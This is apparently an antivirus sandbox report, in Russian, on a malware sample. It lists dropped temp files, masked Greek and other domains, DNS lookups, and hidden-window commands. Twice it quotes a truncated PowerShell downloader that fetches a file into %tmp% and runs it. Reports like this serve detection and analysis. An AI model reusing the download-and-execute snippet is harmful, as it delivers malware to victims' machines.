Техническая информация
- $vonahert как %temp%\klerscor.exe
- '<SYSTEM32>\cmd.exe' /c powershell "'powershell ""function chaitra2([string] $vonaherT){(new-object system.net.webclient).downloadfile($vonaherT,''%tmp%\klerscor.exe'');start-process ''%tmp%\klerscor.exe'';}try{cha...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1476
- %TEMP%\1097903.cvr
- %TEMP%\owernice38.bat
- 'ka###eafoods.gr':80
- 'ka###eafoods.gr':443
- 'st###data.com':80
- http://ka###eafoods.gr/supetre.orau
- http://st###data.com/supetre.orau
- http://www.st###data.com/supetre.orau
- 'ka###eafoods.gr':443
- DNS ASK ka###eafoods.gr
- DNS ASK st###data.com
- '<SYSTEM32>\cmd.exe' /c powershell "'powershell ""function chaitra2([string] $vonaherT){(new-object system.net.webclient).downloadfile($vonaherT,''%tmp%\klerscor.exe'');start-process ''%tmp%\klerscor.exe'';}try{cha...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\owernice38.bat" "' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\owernice38.bat" "